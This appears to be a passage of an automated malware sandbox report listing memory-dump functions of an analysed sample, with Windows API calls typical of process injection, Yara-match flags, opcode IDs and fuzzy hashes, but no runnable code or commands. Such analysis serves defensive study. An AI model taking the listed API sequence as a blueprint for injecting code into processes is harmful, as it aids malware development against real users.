                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: c4e4b9dd1a2c52a4293bb07eac3b63051c2b6f278606460b7db1f56e15c6e855
                                                                      • Instruction ID: f6138e8f2bf58eeb507eb1979ab1691012811e53f81a6150106e383ea253b31a
                                                                      • Opcode Fuzzy Hash: c4e4b9dd1a2c52a4293bb07eac3b63051c2b6f278606460b7db1f56e15c6e855
                                                                      • Instruction Fuzzy Hash: 4CF0F8B6200119AFCB24DF99DC85EEB77ADAF8C354F118249FA19A7341C631E911CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D8790, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,003C2D11,00002000,00003000,00000004), ref: 003D87C9
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateMemoryVirtual
                                                                      • String ID:
                                                                      • API String ID: 2167126740-0
                                                                      • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                      • Instruction ID: 6892dc58782d8c882749a13a3b1683d71a50fe9e08ff0f99ca5963e9e4c4f3b1
                                                                      • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                      • Instruction Fuzzy Hash: 20F015B2200209ABCB14DF89DC81EAB77ADAF88754F118149BE0897341C630F810CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D896D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a8e6752e45476bb98f9f70c7d2c09372981ae2fdb66005fecfaba798bf2471e6
                                                                      • Instruction ID: f47be414593438bc8030276eda64b02cf794416c05c428652b3b767b19db505c
                                                                      • Opcode Fuzzy Hash: a8e6752e45476bb98f9f70c7d2c09372981ae2fdb66005fecfaba798bf2471e6
                                                                      • Instruction Fuzzy Hash: B090027120100846D60071594504B47000697E4341F51C016B0114674D8655CC91B571
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D896E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: cbd6e4a5778540c79666b52c7de7822c19483422306119c326cb8837ff317d67
                                                                      • Instruction ID: d307cfc31ee9eda51a2f64dae9331612e0f7b0c8540919f0fef11f18db377316
                                                                      • Opcode Fuzzy Hash: cbd6e4a5778540c79666b52c7de7822c19483422306119c326cb8837ff317d67
                                                                      • Instruction Fuzzy Hash: C190027120108806D6107159850474B000697D4341F55C411B4414678D86D58CD1B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6748da85309839fc6aa78836b20e807aa725095ecd5f45c55a6757dd45dca1d3
                                                                      • Instruction ID: c24ed073b41be2e8206a50d62d9626849e8da38b388cfc039dd5da04fe45b01c
                                                                      • Opcode Fuzzy Hash: 6748da85309839fc6aa78836b20e807aa725095ecd5f45c55a6757dd45dca1d3
                                                                      • Instruction Fuzzy Hash: 5E90027121180046D70075694D14B07000697D4343F51C115B0144574CC9558CA1A571
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 2f3ba8ccc4850c290ab11ce1cecf3656d93379b222dac94dea7bc027662dc8c3
                                                                      • Instruction ID: 25d0c3b02787b554525a078f77efd6f87cc5a2000c15bfed37971148f4861893
                                                                      • Opcode Fuzzy Hash: 2f3ba8ccc4850c290ab11ce1cecf3656d93379b222dac94dea7bc027662dc8c3
                                                                      • Instruction Fuzzy Hash: 8790027120504846D64071594504A47001697D4345F51C011B00546B4D96658D95F6B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: ee7ac51846fb01494335e5a1a45d5d2cfecfecc0d54f7459a5392ab1f1f65181
                                                                      • Instruction ID: 2c2623cbfb735e1543b7815d492b1ccad0c2ab2d53398b6e4998308f5dee63e1
                                                                      • Opcode Fuzzy Hash: ee7ac51846fb01494335e5a1a45d5d2cfecfecc0d54f7459a5392ab1f1f65181
                                                                      • Instruction Fuzzy Hash: 2990027120100806D6807159450464B000697D5341F91C015B0015674DCA558E99B7F1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 480a870ff2165a296371c8292231ae5b196f2c50bd5a7e9021af88adb13fd165
                                                                      • Instruction ID: b1e9e03ba6795b4d436a1e0ecf4606053cfaa12626222c9b013794f068545441
                                                                      • Opcode Fuzzy Hash: 480a870ff2165a296371c8292231ae5b196f2c50bd5a7e9021af88adb13fd165
                                                                      • Instruction Fuzzy Hash: E890027131114406D61071598504707000697D5241F51C411B0814578D86D58CD1B172
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 96f525b78561b8196390f9bf86545892f2867eff4457e3d4298ed59a40619cba
                                                                      • Instruction ID: 0bcddb99649c39d91f8f9e19be8c208e179a48c70063f83fd29a270feef143b8
                                                                      • Opcode Fuzzy Hash: 96f525b78561b8196390f9bf86545892f2867eff4457e3d4298ed59a40619cba
                                                                      • Instruction Fuzzy Hash: 8090027921300006D6807159550860B000697D5242F91D415B0005578CC9558CA9A371
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a8a4034bc20a05923678877845a3bf3cce6abd5f59835ddd12657ac16c4721fe
                                                                      • Instruction ID: b421e86dc169934b2d3748b10835b67c82b65724309654256bf224e347154ae1
                                                                      • Opcode Fuzzy Hash: a8a4034bc20a05923678877845a3bf3cce6abd5f59835ddd12657ac16c4721fe
                                                                      • Instruction Fuzzy Hash: C690027120100406D60075995508647000697E4341F51D011B5014575EC6A58CD1B171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a14c6665ca376c54be70fbec507548380d37204908c67eebe531c864343407b2
                                                                      • Instruction ID: fdab3419561007ab07cd23dd6d1f9ed55bc06fcb9d7e261f93592af42732d6d5
                                                                      • Opcode Fuzzy Hash: a14c6665ca376c54be70fbec507548380d37204908c67eebe531c864343407b2
                                                                      • Instruction Fuzzy Hash: 98900271242041565A45B15945045074007A7E4281791C012B1404970C85669C96E671
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: e5b0b7521c6893f515e6f44a4f988327a4b30268a9b4d82294673e801ff9b44a
                                                                      • Instruction ID: 04c2d164f849c9a2c039faf49e19c2f160c5b9412721350caf609b0805d153ec
                                                                      • Opcode Fuzzy Hash: e5b0b7521c6893f515e6f44a4f988327a4b30268a9b4d82294673e801ff9b44a
                                                                      • Instruction Fuzzy Hash: 6590027120100417D61171594604707000A97D4281F91C412B0414578D96968D92F171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D895D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a34d237501d9e6eb15f179212a829eefccdc60bf9004e0cb764b09a57fe5b91d
                                                                      • Instruction ID: d66096279c1c743650d7e534d218f69748bb0c00b6b0b0fa9fc1070bd00e2eef
                                                                      • Opcode Fuzzy Hash: a34d237501d9e6eb15f179212a829eefccdc60bf9004e0cb764b09a57fe5b91d
                                                                      • Instruction Fuzzy Hash: D39002B120200007460571594514617400B97E4241B51C021F10045B0DC5658CD1B175
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D899A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: b3f57f520c24e4f9fa2ff2e16f41d1bb27413ab73659d4e771894ddbc8b664f2
                                                                      • Instruction ID: 70efe9322a0e555bc74fe9970a6d6d2ac6ef1a68e8854e4c99e5f454eae890ab
                                                                      • Opcode Fuzzy Hash: b3f57f520c24e4f9fa2ff2e16f41d1bb27413ab73659d4e771894ddbc8b664f2
                                                                      • Instruction Fuzzy Hash: 609002B134100446D60071594514B070006D7E5341F51C015F1054574D8659CC92B176
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8e7f248f72b18338d0e5bca999fd1fba73bf7a3b5b1e83db5d47e78f9786baab
                                                                      • Instruction ID: f32bb3c350429112f690cc6555f54ab2c79c8def63ef71055e77ae3dacfe8076
                                                                      • Opcode Fuzzy Hash: 8e7f248f72b18338d0e5bca999fd1fba73bf7a3b5b1e83db5d47e78f9786baab
                                                                      • Instruction Fuzzy Hash: E2900275211000070605B5590704507004797D9391351C021F1005570CD6618CA1A171
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 02D89910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.515622767.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: true
                                                                      • Associated: 00000012.00000002.516973284.0000000002E3B000.00000040.00000001.sdmp Download File
                                                                      • Associated: 00000012.00000002.517006266.0000000002E3F000.00000040.00000001.sdmp Download File
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: a54b085232909e91d546850e766486ad491b5aa189c0bc5a7d999a24f0a7c51e
                                                                      • Instruction ID: 88eac167a85e80f6d5461198e440fadc91e7f7a678a6eb1394574bdf79a4274e
                                                                      • Opcode Fuzzy Hash: a54b085232909e91d546850e766486ad491b5aa189c0bc5a7d999a24f0a7c51e
                                                                      • Instruction Fuzzy Hash: 5B9002B120100406D64071594504747000697D4341F51C011B5054574E86998DD5B6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D72D0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 003D7378
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: ecf50558a9060ec4e1df6064c2ff240d5e539f6590f5175ecf64a77f36588282
                                                                      • Instruction ID: 45f6d938b184bb220c41253de6bb90ed6fbaa4863319b6bacda90d0a4a05dce6
                                                                      • Opcode Fuzzy Hash: ecf50558a9060ec4e1df6064c2ff240d5e539f6590f5175ecf64a77f36588282
                                                                      • Instruction Fuzzy Hash: C83181B6505604ABC716DF68D8A1FABB7B8FF48700F04811EFA199B341D770A955CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D72C7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • Sleep.KERNELBASE(000007D0), ref: 003D7378
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Sleep
                                                                      • String ID: net.dll$wininet.dll
                                                                      • API String ID: 3472027048-1269752229
                                                                      • Opcode ID: 85a205f1776b4d367c130f75dbe972d85131c5f4ca7c1d559701bf913afeaf32
                                                                      • Instruction ID: 26e3edb5204f002bc89388e67a1e9bcd0488bf09a7adbb22885e64d7fdb0993a
                                                                      • Opcode Fuzzy Hash: 85a205f1776b4d367c130f75dbe972d85131c5f4ca7c1d559701bf913afeaf32
                                                                      • Instruction Fuzzy Hash: 4E21A2B6605600ABD716DF68D8A1F9BB7B8FF48700F14812EF9199B342D770A855CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D88B2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003C3B93), ref: 003D88ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: fb577c580f140c774de91f11b8bc0a00e42ac97be9b1401ed09f88cfedee0994
                                                                      • Instruction ID: 4382370002bc9b8cf54de05fce3c985b290de52aea76290deceb48d5f7781e26
                                                                      • Opcode Fuzzy Hash: fb577c580f140c774de91f11b8bc0a00e42ac97be9b1401ed09f88cfedee0994
                                                                      • Instruction Fuzzy Hash: 90F062762002146FC716DFA8EC49EE777A9EF89324F008556F94C9B312D530E915CAF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D8880, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(&5=,?,003D3C9F,003D3C9F,?,003D3526,?,?,?,?,?,00000000,00000000,?), ref: 003D88AD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: &5=
                                                                      • API String ID: 1279760036-970485223
                                                                      • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction ID: 7afc3cf4c31115b7e3ad64cb54e08c0095488ae4eb8c1443ef6471244117954b
                                                                      • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                      • Instruction Fuzzy Hash: A3E012B2200208ABDB14EF99DC45EA777ADAF88654F118559BA085B342CA30F910CAF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D88C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,003C3B93), ref: 003D88ED
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID: .z`
                                                                      • API String ID: 3298025750-1441809116
                                                                      • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction ID: 85352a21715a9acbb7e90f1c5f73196b056eec7c097b452b007bac3f4cbeefbf
                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                      • Instruction Fuzzy Hash: 76E04FB12002056BD714DF59DC49EA777ADEF88750F014555FE085B341C630F910CAF0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003C7280, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 003C72DA
                                                                      • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 003C72FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 88186e1a6a040d2bf16c93278c7dfa049f009a70260cbae7ddabd39e281de416
                                                                      • Instruction ID: 4862464d8fbb89bc5dc5271796b857411a123358c5105f864c6cb86edb3785b0
                                                                      • Opcode Fuzzy Hash: 88186e1a6a040d2bf16c93278c7dfa049f009a70260cbae7ddabd39e281de416
                                                                      • Instruction Fuzzy Hash: DF018F32A8022976E722A6949C03FBE776C5B00B50F150519FF04FE2C2EAA46E0647E6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003CD417, Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,003C7C83,?), ref: 003CD44B
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorMode
                                                                      • String ID:
                                                                      • API String ID: 2340568224-0
                                                                      • Opcode ID: 80dfb07871fb7cdd93fced538cf74e17c5b88782aa7f81d92c2eacaf6f6ebd17
                                                                      • Instruction ID: 194b17815e4e70b0783dc1bb4ca45d81dbee9da8ac020ded2ba3c0e87d8e96df
                                                                      • Opcode Fuzzy Hash: 80dfb07871fb7cdd93fced538cf74e17c5b88782aa7f81d92c2eacaf6f6ebd17
                                                                      • Instruction Fuzzy Hash: 4931F872A501187EEB16EB90EC46FBA736CDB54714F0541AEFD08DB242EB709E4487A2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003C9B30, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 003C9BA2
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load
                                                                      • String ID:
                                                                      • API String ID: 2234796835-0
                                                                      • Opcode ID: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                      • Instruction ID: 73de467a03139d0bc66342c0a8e5ea8001780d9f75f9db1119b3508692cc5a75
                                                                      • Opcode Fuzzy Hash: b151b7aefe362f9f53239ff94c441e7fc7ff50d12aa80511d0004ed55a8a3314
                                                                      • Instruction Fuzzy Hash: 5E011EB6D0020DBBDF11EBA4EC86F9DB7B89B54308F00419AA9089B241F671EB14CB91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D892D, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003D8984
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 9837cecb357a722f42e6f40b62fe3e27b665772340ac94f8699bbd2f174e1823
                                                                      • Instruction ID: 0c1c150a3282b3e2acf4ccfbbeffbe38511f7b0aa03cf14b5b369247f22736dc
                                                                      • Opcode Fuzzy Hash: 9837cecb357a722f42e6f40b62fe3e27b665772340ac94f8699bbd2f174e1823
                                                                      • Instruction Fuzzy Hash: AA01F2B2200109BFCB04DF88DC84EEB37ADAF8C354F158208FA0DA7240DA30E841CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D8930, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 003D8984
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateInternalProcess
                                                                      • String ID:
                                                                      • API String ID: 2186235152-0
                                                                      • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction ID: 1abb0db7ec108e0f434b13e43b17b434d748abc899fcef3b8e13c058aa0ab630
                                                                      • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                      • Instruction Fuzzy Hash: 3101B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97241C630E851CBA4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D7400, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,003CCCE0,?,?), ref: 003D743C
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.512579124.00000000003C0000.00000040.00020000.sdmp, Offset: 003C0000, based on PE: false
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateThread
                                                                      • String ID:
                                                                      • API String ID: 2422867632-0
                                                                      • Opcode ID: e8f7359f4bedd460e93fcc7b610fa5d401544a37555f2b0317736e19f5f75f0c
                                                                      • Instruction ID: 208f7d21ad8dd9c691f49d574f942346d754b386c21c2ab26d5ab72829ead12a
                                                                      • Opcode Fuzzy Hash: e8f7359f4bedd460e93fcc7b610fa5d401544a37555f2b0317736e19f5f75f0c
                                                                      • Instruction Fuzzy Hash: 64E092733803043AE33265A9BC03FA7B39CCB81B25F550026FB0DEB2C1D595F80142A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 003D8A13, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
